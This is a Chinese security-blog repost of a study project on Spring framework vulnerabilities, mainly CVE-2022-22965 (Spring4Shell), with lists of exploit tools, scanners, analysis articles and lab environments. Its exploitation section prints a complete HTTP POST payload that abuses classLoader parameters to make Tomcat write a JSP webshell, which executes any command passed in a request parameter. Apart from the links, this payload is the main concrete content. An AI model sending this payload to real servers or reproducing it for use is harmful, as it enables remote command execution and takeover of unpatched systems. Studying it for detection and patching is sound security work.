【转】HackSpring-永恒之春

admin 2022年4月30日13:04:17安全文章评论14 views3985字阅读13分17秒阅读模式

HackSpring-永恒之春

本项目用来致敬全宇宙最无敌Spring框架!同时也记录自己在学习Spring漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2022年3月30日,最近的一次更新时间为2022年4月26日。作者:0e0w[1]

01-Spring基础知识[2]02-Spring框架识别[3]03-Spring上层建筑[4]04-Spring漏洞汇总[5]05-Spring检测利用[6]06-Spring漏洞修复[7]07-Spring分析文章[8]08-Spring靶场环境[9]

01-Spring基础知识

SpringSpringBoot

02-Spring框架识别

https://mp.weixin.qq.com/s/cmkTMw_QS8o1wMsRd0E0XQ

03-Spring上层建筑

Spring + ? = rce !

04-Spring漏洞汇总

CVE-2022-22965

05-Spring检测利用

如何判断一个网站是否存在Spring漏洞?如何查找内网中存在Sprin漏洞?

一、Payload

POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 761

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

二、源码检测

https://github.com/webraybtl/springcore_detect

三、漏洞验证

测试时发现webshell只能写入一次!第二次失败!

四、漏洞扫描

五、其他工具

https://github.com/TheGejr/SpringShellhttps://github.com/BobTheShoplifter/Spring4Shell-POChttps://github.com/kh4sh3i/Spring-CVEhttps://github.com/GuayoyoCyber/CVE-2022-22965https://github.com/viniciuspereiras/CVE-2022-22965-pochttps://github.com/reznok/Spring4Shell-POChttps://github.com/jschauma/check-springshellhttps://github.com/colincowie/Safer_PoC_CVE-2022-22965https://github.com/alt3kx/CVE-2022-22965https://github.com/alt3kx/CVE-2022-22965_PoChttps://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCEhttps://github.com/light-Life/CVE-2022-22965-GUItoolshttps://github.com/Mr-xn/spring-core-rcehttps://github.com/Kirill89/CVE-2022-22965-PoChttps://github.com/Axx8/SpringFramework_CVE-2022-22965_RCEhttps://github.com/likewhite/CVE-2022-22965https://github.com/mebibite/springhoundhttps://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shellhttps://github.com/hktalent/spring-spel-0day-pochttps://github.com/darryk10/CVE-2022-22963https://github.com/WeiJiLab/Spring4Shell-POChttps://github.com/Corgizz/SpringCloudhttps://github.com/NewBeginning6/spring-Framework-rcehttps://github.com/wjl110/CVE-2022-22965_Spring_Core_RCEhttps://github.com/k3rwin/spring-core-rcehttps://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410https://github.com/YanMu2020/SpringScanhttps://github.com/wearearima/poc-cve-2018-1273https://github.com/metaStor/SpringScanhttps://github.com/fullhunt/spring4shell-scanhttps://github.com/Qualys/spring4scanwin

06-Spring漏洞修复

07-Spring分析文章

https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.htmlhttps://bugalert.org/content/notices/2022-03-29-spring.htmlhttps://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-pochttps://www.springcloud.io/post/2022-03/spring-0day-vulnerabilityhttps://spring.io/blog/2022/03/31/spring-framework-rce-early-announcementhttps://tttang.com/archive/1532

08-Spring靶场环境

https://github.com/jbaines-r7/spring4shell_vulnapphttps://github.com/Kirill89/CVE-2022-22965-PoChttps://github.com/DDuarte/springshell-rce-pochttps://github.com/XuCcc/VulEnv

Stargazers over time

[10]


引用链接

[1] 0e0w: https://github.com/0e0w
[2] 01-Spring基础知识:
[3] 02-Spring框架识别:
[4] 03-Spring上层建筑:
[5] 04-Spring漏洞汇总:
[6] 05-Spring检测利用:
[7] 06-Spring漏洞修复:
[8] 07-Spring分析文章:
[9] 08-Spring靶场环境:
[10]

Stargazers over time

https://starchart.cc/HackJava/Spring


原文始发于微信公众号(利刃藏锋):【转】HackSpring-永恒之春

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月30日13:04:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【转】HackSpring-永恒之春 http://cn-sec.com/archives/965262.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: